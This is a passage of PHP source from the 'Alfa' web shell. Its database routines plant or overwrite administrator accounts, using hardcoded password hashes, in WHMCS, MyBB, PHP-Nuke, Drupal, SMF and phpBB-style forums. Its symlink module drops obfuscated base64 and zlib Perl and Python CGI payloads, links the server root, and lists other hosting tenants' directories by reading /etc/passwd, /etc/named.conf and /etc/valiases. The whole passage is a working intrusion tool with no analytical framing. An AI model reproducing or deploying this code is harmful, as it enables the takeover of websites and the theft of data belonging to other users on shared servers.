'; if ($_POST['alfa1'] && $_POST['alfa1'] == '>>'){ $localhost = $_POST['alfa2']; $database = $_POST['alfa3']; $username = $_POST['alfa4']; $password = $_POST['alfa6']; $admin = $_POST['alfa8']; $SQL = $_POST['alfa9']; $prefix = $_POST['alfa10']; $conn=@mysqli_connect($localhost,$username,$password,$database) or die(mysqli_error($conn)); $hash = md5('solevisible'); $solevisible=@mysqli_query($conn,"UPDATE ".$prefix."users SET username_clean ='".$admin."' WHERE username_clean = 'admin'") or die(mysqli_error($conn)); $solevisible=@mysqli_query($conn,"UPDATE ".$prefix."users SET user_password ='".$hash."' WHERE username_clean = 'admin'") or die(mysqli_error($conn)); $solevisible=@mysqli_query($conn,"UPDATE ".$prefix."users SET username_clean ='".$admin."' WHERE user_type = 3") or die(mysqli_error($conn)); $solevisible=@mysqli_query($conn,"UPDATE ".$prefix."users SET user_password ='".$hash."' WHERE user_type = 3") or die(mysqli_error($conn)); $solevisible=@mysqli_query($conn,"UPDATE ".$prefix."users SET user_email ='".$SQL."' WHERE username_clean = 'admin'") or die(mysqli_error($conn)); if($solevisible){ __alert('Success... '.$admin.' is created...'); } } } if(isset($_POST['alfa6']) && $_POST['alfa6'] == 'whmcs'){ echo __pre().'
| Whmcs |

'.getConfigHtml('whmcs').'

'; $table = array('td1' => array('color' => 'FFFFFF', 'tdName' => 'Mysql Host', 'id'=>'db_host','inputName' => 'localhost', 'inputValue' => 'localhost', 'inputSize' => '50'), 'td2' => array('color' => 'FFFFFF', 'tdName' => 'Db Name', 'id'=>'db_name','inputName' => 'database', 'inputValue' => '', 'inputSize' => '50'), 'td3' => array('color' => 'FFFFFF', 'tdName' => 'Db User', 'id'=>'db_user','inputName' => 'username', 'inputValue' => '', 'inputSize' => '50'), 'td4' => array('color' => 'FFFFFF', 'tdName' => 'Db Pass', 'id'=>'db_pw','inputName' => 'password', 'inputValue' => '', 'inputSize' => '50'), 'td6' => array('color' => 'FF0000', 'tdName' => 'Admin User', 'inputName' => 'admin', 'inputValue' => 'admin', 'inputSize' => '50'), 'td7' => array('color' => 'FF0000', 'tdName' => 'Admin Pass', 'inputName' => 'toftof', 'inputValue' => 'solevisible', 'inputSize' => '50', 'disabled' => true), 'td8' => array('color' => 'FF0000', 'tdName' => 'Admin Email', 'inputName' => 'email', 'inputValue' => 'solevisible@fbi.gov', 'inputSize' => '50') ); create_table($table); echo '

'; if ($_POST['alfa1'] && $_POST['alfa1'] == '>>'){ $localhost = $_POST['alfa2']; $database = $_POST['alfa3']; $username = $_POST['alfa4']; $password = $_POST['alfa5']; $admin = $_POST['alfa8']; $SQL = $_POST['alfa9']; $conn=@mysqli_connect($localhost,$username,$password,$database) or die(mysqli_error($conn)); $solevisible=@mysqli_query($conn,"insert into tbladmins (id,roleid,username,password,email,template,homewidgets) values(null,'1','".$admin."','d4a590caacc0be55ef286e40a945ea45','".$SQL."','blend','getting_started:true,orders_overview:true,supporttickets_overview:true,my_notes:true,client_activity:true,open_invoices:true,activity_log:true|income_overview:true,system_overview:true,whmcs_news:true,sysinfo:true,admin_activity:true,todo_list:true,network_status:true,income_forecast:true|')") or die(mysqli_error($conn)); if($solevisible){ __alert('Success... '.$admin.' is created...');} } } if(isset($_POST['alfa7']) && $_POST['alfa7'] == 'mybb'){ echo __pre().'
| Mybb |

'.getConfigHtml('mybb').'

'; $table = array('td1' => array('color' => 'FFFFFF', 'tdName' => 'Mysql Host', 'id'=>'db_host','inputName' => 'localhost', 'inputValue' => 'localhost', 'inputSize' => '50'), 'td2' => array('color' => 'FFFFFF', 'tdName' => 'Db Name', 'id'=>'db_name','inputName' => 'database', 'inputValue' => '', 'inputSize' => '50'), 'td3' => array('color' => 'FFFFFF', 'tdName' => 'Db User', 'id'=>'db_user','inputName' => 'username', 'inputValue' => '', 'inputSize' => '50'), 'td4' => array('color' => 'FFFFFF', 'tdName' => 'Db Pass', 'id'=>'db_pw','inputName' => 'password', 'inputValue' => '', 'inputSize' => '50'), 'td5' => array('color' => 'FFFFFF', 'tdName' => 'Table Prefix', 'id'=>'db_prefix','inputName' => 'prefix', 'inputValue' => '', 'inputSize' => '50'), 'td6' => array('color' => 'FF0000', 'tdName' => 'Admin User', 'inputName' => 'admin', 'inputValue' => 'admin', 'inputSize' => '50'), 'td7' => array('color' => 'FF0000', 'tdName' => 'Admin Pass', 'inputName' => 'toftof', 'inputValue' => 'solevisible', 'inputSize' => '50', 'disabled' => true), 'td8' => array('color' => 'FF0000', 'tdName' => 'Admin Email', 'inputName' => 'email', 'inputValue' => 'solevisible@fbi.gov', 'inputSize' => '50') ); create_table($table); echo '

'; if ($_POST['alfa1'] && $_POST['alfa1'] == '>>'){ $localhost = $_POST['alfa2']; $database = $_POST['alfa3']; $username = $_POST['alfa4']; $password = $_POST['alfa5']; $admin = $_POST['alfa8']; $SQL = $_POST['alfa9']; $prefix = $_POST['alfa10']; $conn=@mysqli_connect($localhost,$username,$password,$database) or die(mysqli_error($conn)); $solevisible=@mysqli_query($conn,"insert into ".$prefix."users (uid,username,password,salt,email,usergroup) values(null,'".$admin."','e71f2c3265619038d826a1ac6e2b9b8e','ywza68lS','".$SQL."','4')") or die(mysqli_error($conn)); if($solevisible){ __alert('Success... '.$admin.' is created...');} } } if(isset($_POST['alfa8']) && $_POST['alfa8'] == 'nuke'){ echo __pre().'
| PhpNuke |

'.getConfigHtml('phpnuke').'

'; $table = array('td1' => array('color' => 'FFFFFF', 'tdName' => 'Mysql Host', 'id'=>'db_host','inputName' => 'localhost', 'inputValue' => 'localhost', 'inputSize' => '50'), 'td2' => array('color' => 'FFFFFF', 'tdName' => 'Db Name', 'id'=>'db_name','inputName' => 'database', 'inputValue' => '', 'inputSize' => '50'), 'td3' => array('color' => 'FFFFFF', 'tdName' => 'Db User', 'id'=>'db_user','inputName' => 'username', 'inputValue' => '', 'inputSize' => '50'), 'td4' => array('color' => 'FFFFFF', 'tdName' => 'Db Pass', 'id'=>'db_pw','inputName' => 'password', 'inputValue' => '', 'inputSize' => '50'), 'td5' => array('color' => 'FFFFFF', 'tdName' => 'Table Prefix', 'id'=>'db_prefix','inputName' => 'prefix', 'inputValue' => '', 'inputSize' => '50'), 'td6' => array('color' => 'FF0000', 'tdName' => 'Admin User', 'inputName' => 'admin', 'inputValue' => 'admin', 'inputSize' => '50'), 'td7' => array('color' => 'FF0000', 'tdName' => 'Admin Pass', 'inputName' => 'toftof', 'inputValue' => 'solevisible', 'inputSize' => '50', 'disabled' => true), 'td8' => array('color' => 'FF0000', 'tdName' => 'Admin Email', 'inputName' => 'email', 'inputValue' => 'solevisible@fbi.gov', 'inputSize' => '50') ); create_table($table); echo '

'; if ($_POST['alfa1'] && $_POST['alfa1'] == '>>'){ $localhost = $_POST['alfa2']; $database = $_POST['alfa3']; $username = $_POST['alfa4']; $password = $_POST['alfa5']; $admin = $_POST['alfa7']; $SQL = $_POST['alfa9']; $prefix = $_POST['alfa10']; $conn=@mysqli_connect($localhost,$username,$password,$database) or die(mysqli_error($conn)); $hash = md5($pwd); $solevisible=@mysqli_query($conn,"insert into ".$prefix."_authors(aid,name,email,pwd) values('$admin','God','$SQL','d4a590caacc0be55ef286e40a945ea45')") or die(mysqli_error($conn)); if($solevisible){ __alert('Success... '.$admin.' is created...');} } } if(isset($_POST['alfa9']) && $_POST['alfa9'] == 'drupal'){ echo __pre().'
| Drupal |

'.getConfigHtml('drupal').'

'; $table = array('td1' => array('color' => 'FFFFFF', 'tdName' => 'Mysql Host', 'id'=>'db_host','inputName' => 'localhost', 'inputValue' => 'localhost', 'inputSize' => '50'), 'td2' => array('color' => 'FFFFFF', 'tdName' => 'Db Name', 'id'=>'db_name','inputName' => 'database', 'inputValue' => '', 'inputSize' => '50'), 'td3' => array('color' => 'FFFFFF', 'tdName' => 'Db User', 'id'=>'db_user','inputName' => 'username', 'inputValue' => '', 'inputSize' => '50'), 'td4' => array('color' => 'FFFFFF', 'tdName' => 'Db Pass', 'id'=>'db_pw','inputName' => 'password', 'inputValue' => '', 'inputSize' => '50'), 'td6' => array('color' => 'FF0000', 'tdName' => 'Admin User', 'inputName' => 'admin', 'inputValue' => 'admin', 'inputSize' => '50'), 'td7' => array('color' => 'FF0000', 'tdName' => 'Admin Pass', 'inputName' => 'toftof', 'inputValue' => 'solevisible', 'inputSize' => '50', 'disabled' => true) ); create_table($table); echo '

'; if ($_POST['alfa1'] && $_POST['alfa1'] == '>>'){ $localhost = $_POST['alfa2']; $database = $_POST['alfa4']; $username = $_POST['alfa5']; $password = $_POST['alfa6']; $admin = $_POST['alfa8']; $conn=@mysqli_connect($localhost,$username,$password,$database) or die(mysqli_error($conn)); $getDescuid = @mysqli_query($conn,"select uid from users order by uid desc limit 0,1"); $getDescuid = @mysqli_fetch_assoc($getDescuid); $getDescuid = $getDescuid['uid']; $getdescuid = $getDescuid++; $solevisible=@mysqli_query($conn,"insert into users (uid,name,pass,mail,signature_format,status,timezone,init) values('$getDescuid','$admin','\$S\$DP2y9AbolCBOd\/WyQcpzu4zF57qE0noyCNeXZWv.37R66VsFjOiC','solevisible@fbi.gov','filtered_html','1','Europe/Berlin','solevisible@fbi.gov')") or die(mysqli_error($conn)); $solevisible=@mysqli_query($conn,"select uid from users where name='".$admin."'") or die(mysqli_error($conn)); $sole = mysqli_num_rows($solevisible); if ($sole == 1){ $solevis = mysqli_fetch_assoc($solevisible); $res = $solevis['uid']; } $solevisible=@mysqli_query($conn,"INSERT INTO users_roles (uid,rid) VALUES ('".$res."', '3')") or die(mysqli_error($conn)); if($solevisible){ __alert('Success... '.$admin.' is created...');} } } if(isset($_POST['alfa10']) && $_POST['alfa10'] == 'smf'){ echo __pre().'
| SMF |

'.getConfigHtml('smf').'

'; $table = array('td1' => array('color' => 'FFFFFF', 'tdName' => 'Mysql Host', 'id'=>'db_host','inputName' => 'localhost', 'inputValue' => 'localhost', 'inputSize' => '50'), 'td2' => array('color' => 'FFFFFF', 'tdName' => 'Db Name', 'id'=>'db_name','inputName' => 'database', 'inputValue' => '', 'inputSize' => '50'), 'td3' => array('color' => 'FFFFFF', 'tdName' => 'Db User', 'id'=>'db_user','inputName' => 'username', 'inputValue' => '', 'inputSize' => '50'), 'td4' => array('color' => 'FFFFFF', 'tdName' => 'Db Pass', 'id'=>'db_pw','inputName' => 'password', 'inputValue' => '', 'inputSize' => '50'), 'td5' => array('color' => 'FFFFFF', 'tdName' => 'Table Prefix', 'id'=>'db_prefix','inputName' => 'prefix', 'inputValue' => 'smf_', 'inputSize' => '50'), 'td6' => array('color' => 'FF0000', 'tdName' => 'Admin User', 'inputName' => 'admin', 'inputValue' => 'admin', 'inputSize' => '50'), 'td7' => array('color' => 'FF0000', 'tdName' => 'Admin Pass', 'inputName' => 'hi', 'inputValue' => 'solevisible', 'inputSize' => '50', 'disabled' => true), ); create_table($table); echo '

'; if ($_POST['alfa1'] && $_POST['alfa1'] == '>>'){ $localhost = $_POST['alfa2']; $database = $_POST['alfa3']; $username = $_POST['alfa5']; $password = $_POST['alfa6']; $prefix = $_POST['alfa7']; $admin = $_POST['alfa8']; $conn=@mysqli_connect($localhost,$username,$password,$database) or die(mysqli_error($conn)); $setpwAlg = sha1(strtolower($admin) . 'solevisible'); $solevisible=@mysqli_query($conn,"insert into {$prefix}members (id_member,member_name,id_group,real_name,passwd,email_address) values(null,'$admin','1','$admin','$setpwAlg','solevisible@fbi.gov')") or die(mysqli_error($conn)); if($solevisible){ __alert('Success... '.$admin.' is created...');} } } echo "
"; alfafooter(); } function alfaMakePwd(){ if(_alfa_file_exists("/etc/virtual/domainowners")||(_alfa_file_exists("/etc/named.conf")&&_alfa_file_exists("/etc/valiases"))){ return "/home/{user}/public_html/"; } $document = explode("/", $_SERVER["DOCUMENT_ROOT"]); $public = end($document); array_pop($document); array_pop($document); $path = implode("/", $document) . "/{user}/" . $public; return $path; } function alfaGetDomains($state = false){ $state = "named.conf"; $lines = array(); $lines = _alfa_file('/etc/named.conf'); if(!$lines){ $lines = @scandir("/etc/valiases/"); $state = "valiases"; if(!$lines){ $lines = @scandir("/var/named"); $state = "named"; if(!$lines && $state){ $lines = _alfa_file('/etc/passwd'); $state = "passwd"; } } } return array("lines" => $lines, "state" => $state); } function alfasymlink(){ alfahead(); AlfaNum(9,10); echo '

| Symlink |

| Symlink( php ) | | Symlink( perl ) | | Symlink(python ) | | File Symlink |

'; if(isset($_POST['alfa2'])&&($_POST['alfa2']=='symperl'||$_POST["alfa2"]=="sympy")){ $sympath = alfaMakePwd(); @mkdir('cgialfa',0755); @chdir('cgialfa'); alfacgihtaccess('cgi'); $perl = '#!/usr/bin/perl -I/usr/local/bandmin'."\n".'use MIME::Base64;use Compress::Zlib;eval(Compress::Zlib::memGunzip(decode_base64("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")));'; $py = '#!/usr/bin/python'."\nimport zlib, base64\n".'eval(compile(zlib.decompress(base64.b64decode("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")),\'\',\'exec\'))'; $cginame = "symperl.alfa"; $source = $perl; $lang = "perl"; if($_POST["alfa2"]=="sympy"){ $cginame = "pysymlink.alfa"; $source = $py; $lang = "python"; } @__write_file($cginame,$source); @chmod($cginame,0755); echo __pre(); $resource = alfaEx("{$lang} {$cginame} {$sympath}",false,true,true); if(strlen($resource) == 0){ echo AlfaiFrameCreator('cgialfa/'.$cginame); }else{ echo $resource; } } if(isset($_POST['alfa4']) && $_POST['alfa4']=='SymFile'){ if(function_exists('symlink')||_alfa_can_runCommand(true,true)){ AlfaNum(9,10); echo __pre().'

| Symlink File And Directory |


'; $path = $_POST['alfa5']; $symname = $_POST['alfa6']; $solevisible58 = $_POST['alfa7']; if($solevisible58){ $new_name = str_replace(".", "_", basename($symname)); $rand_dir = $new_name.rand(111,9999); $sym_dir = 'alfasymlinkphp/'.$rand_dir.'/'; @mkdir($sym_dir, 0777, true); alfacgihtaccess('sym', $sym_dir, $symname); _alfa_symlink("$path","$sym_dir/$symname"); echo __pre(); echo '
Click >> '.$symname.'
'; } }else{echo "
[+] Symlink Function Disabled !
";} } if(isset($_POST['alfa2']) && $_POST['alfa2']=='symphp'){ $cant_symlink = true; if(function_exists('symlink')||_alfa_can_runCommand(false,false)){ @mkdir('alfasymlink',0777); alfacgihtaccess('sym','alfasymlink/'); _alfa_symlink('/','alfasymlink/root'); $table_header = "

"; if(_alfa_file_exists("/etc/named.conf") && !_alfa_file_exists("/etc/virtual/domainowners") && _alfa_file_exists("/etc/valiases/")){ echo "
"; $lines = array(); $anony_domains = array(); $anonymous_users = array(); $f_black = array(); $error = false; $anonymous = false; $makepwd = "/home/{user}/public_html/"; $domains = alfaGetDomains(); $lines = $domains["lines"]; $state = $domains["state"]; $is_posix = function_exists("posix_getpwuid") && function_exists("fileowner"); $can_runcmd = _alfa_can_runCommand(false,false); if(!$is_posix && !$can_runcmd){ $anonymous = true; $anony_domains = $domains["lines"]; $lines = _alfa_file('/etc/passwd'); } echo $table_header; $count=1; $template = '
'; foreach($lines as $line){ $domain = ""; $owner = ""; if($anonymous){ $explode = explode(":", $line); $owner = $explode[0]; $owner_len = strlen($owner) - 1; $userid = $explode[2]; if((int)$userid < 500)continue; $domain = "[?????]"; $temp_black = array(); $finded = false; foreach($anony_domains as $anony){ if($state == "named.conf"){ if(@strstr($anony, 'zone')){ preg_match_all('#zone "(.*)"#',$anony, $data); $domain = $data[1][0]; }else{ continue; } }elseif($state == "named" || $state == "valiases"){ if($anony == "." || $anony == "..")continue; if($state == "named")$anony = rtrim($anony, ".db"); $domain = $anony; } $sub_domain = str_replace(array("-","."), "", $domain); if(substr($owner, 0, $owner_len) == substr($sub_domain, 0, $owner_len)){ if(in_array($owner.$domain, $temp_black))continue; $sympath = str_replace("{user}", $owner, $makepwd); $http = "http://".$domain; echo str_replace(array("{count}", "{http}", "{domain}", "{owner}", "{sympath}"), array($count, $http, $domain, $owner, $sympath), $template); $count++; $temp_black[] = $owner.$domain; $finded = true; } } if(!$finded){ $anonymous_users[] = $owner; } }else{ if($state == "named.conf"){ if(@strstr($line, 'zone')){ preg_match_all('#zone "(.*)"#',$line, $data); $domain = $data[1][0]; }else{ continue; } }elseif($state == "named" || $state == "valiases"){ if($line == "." || $line == "..")continue; if($state == "named")$line = rtrim($line, ".db"); $domain = $line; } if(strlen(trim($domain)) > 2 && $state != "passwd"){ if(!_alfa_file_exists('/etc/valiases/'.$domain, false))continue; if($is_posix){ $user = @posix_getpwuid(@fileowner('/etc/valiases/'.$domain)); $owner = $user["name"]; }elseif($can_runcmd){ $owner = alfaEx("stat -c '%U' /etc/valiases/".$domain,false,false); } } } if(!$anonymous){ if(strlen($owner)==0 || in_array($owner.$domain, $f_black))continue; $sympath = str_replace("{user}", $owner, $makepwd); $http = "http://".$domain; if($state == "passwd"){ $http = "javascript:alert('we cant find domain...')"; } echo str_replace(array("{count}", "{http}", "{domain}", "{owner}", "{sympath}"), array($count, $http, $domain, $owner, $sympath), $template); $count++; $f_black[] = $owner.$domain; } } if($anonymous){ foreach($anonymous_users as $owner){ $sympath = str_replace("{user}", $owner, $makepwd); $http = "javascript:alert('we cant find domain...')"; echo str_replace(array("{count}", "{http}", "{domain}", "{owner}", "{sympath}"), array($count, $http, "[????]", $owner, $sympath), $template); $count++; } } $cant_symlink = false; }else{ $is_direct = false; $makepwd = alfaMakePwd(); if(_alfa_file_exists("/etc/virtual/domainowners")){ $makepwd = "/home/{user}/public_html"; $is_direct = true; } $sole = _alfa_file("/etc/virtual/domainowners"); $count=1; echo $table_header; $template = ''; if($sole){ foreach($sole as $visible){ if(@strstr($visible,":")){ $solevisible = explode(':', $visible); $cwd = str_replace("{user}", trim($solevisible[1]), $makepwd); echo str_replace(array("{count}","{user}","{url}","{cwd}"), array($count++, trim($solevisible[1]), trim($solevisible[0]), $cwd), $template); } } }else{ $passwd = _alfa_file("/etc/passwd"); if($passwd){ $html = ""; $is_named = false; $users = array(); $domains = array(); $uknowns = array(); foreach($passwd as $user){ $user = trim($user); $expl = explode(":", $user); if((int)$expl[2] < 500)continue; $users[$expl[0]] = $expl[5]; } $site_domains = @scandir("/etc/virtual/"); if(!$site_domains){ $site_domains = alfaEx("ls /etc/virtual/"); $site_domains = explode("\n", $site_domains); if(!$site_domains){ $site_domains = _alfa_file("/etc/named.conf"); if($site_domains){$is_named = true;} } } foreach($site_domains as $line){ if($is_named){ if(@strstr($line, 'zone')){ preg_match_all('#zone "(.*)"#',$line, $data); $domain = $data[1][0]; if(strlen($domain > 2) && !empty($domain)){ $domains[] = $domain; } } }else{ $domains[] = $line; } } $x = 1; foreach($users as $user => $home){ foreach($domains as $domain){ $user_len = strlen($user) - 1; $sub_domain = str_replace(array("-","."), "", $domain); $five_user = substr($user, 0,$user_len); $five_domain = substr($sub_domain, 0,$user_len); if($five_user == $five_domain){ if($is_direct){ $cwd = str_replace("{user}", $user, $makepwd); }else{ $expl = explode("}/", $makepwd); $cwd = $home."/".$expl[1]; } $html .= str_replace(array("{count}","{user}","{url}", "{cwd}"), array($x++, $user, $domain, $cwd), $template); }else{ $uknowns[$user] = $home; } } } $uknowns = array_unique($uknowns); foreach($uknowns as $user => $home){ if($is_direct){ $cwd = str_replace("{user}", $user, $makepwd); }else{ $expl = explode("}/", $makepwd); $cwd = $home."/".$expl[1]; } $html .= str_replace(array("{count}","{user}","{url}", "{cwd}"), array($x++, $user, "[?????]", $cwd), $template); } echo($html); } } echo "
*DomainsUserssymlink
{count}{domain} {owner}Symlink
{count}{url} {user}Symlink
"; $cant_symlink = false; } }else{ echo "
[+] Symlink Function Disabled !
"; $cant_symlink = false; } if($cant_symlink)echo '

Error...
'; echo "
"; } echo "
